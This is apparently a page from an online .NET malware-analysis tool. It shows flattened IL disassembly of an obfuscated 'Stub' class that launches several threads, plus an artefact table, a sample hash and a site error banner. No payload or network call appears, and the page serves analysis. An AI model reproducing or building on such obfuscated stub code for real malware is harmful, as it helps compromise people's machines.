System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Threading.Thread::Start() ldnull <null> ldftn System.Void Stub.KX1iRc9Ra93h63s::MySWt4NwFrp0WGo() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Threading.Thread::Start() call System.String Stub.DgKM7y3nhn0CPCj::AWFNIMvOgYysOD9() call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.String) brfalse.s IL_02E3: ldnull call System.Void Stub.ArxItj3SwQj3iS3::p50lhF8HVP2eHGC() ldnull <null> ldftn System.Void Stub.KX1iRc9Ra93h63s::D5p0cZO0V4KWPTR() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.1 <null> ldnull <null> ldftn System.Void Stub.KX1iRc9Ra93h63s::Uw1xHiYpRqdSjE4() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.2 <null> ldloc.1 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.2 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.2 <null> callvirt System.Void System.Threading.Thread::Join() ret <null>
Artefacts
Name
 Value
Embedded Resources

0
Suspicious Type Names (1-2 chars)

0
a3bf159d70832ad75b988d1b2bf70e40 (173.06 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙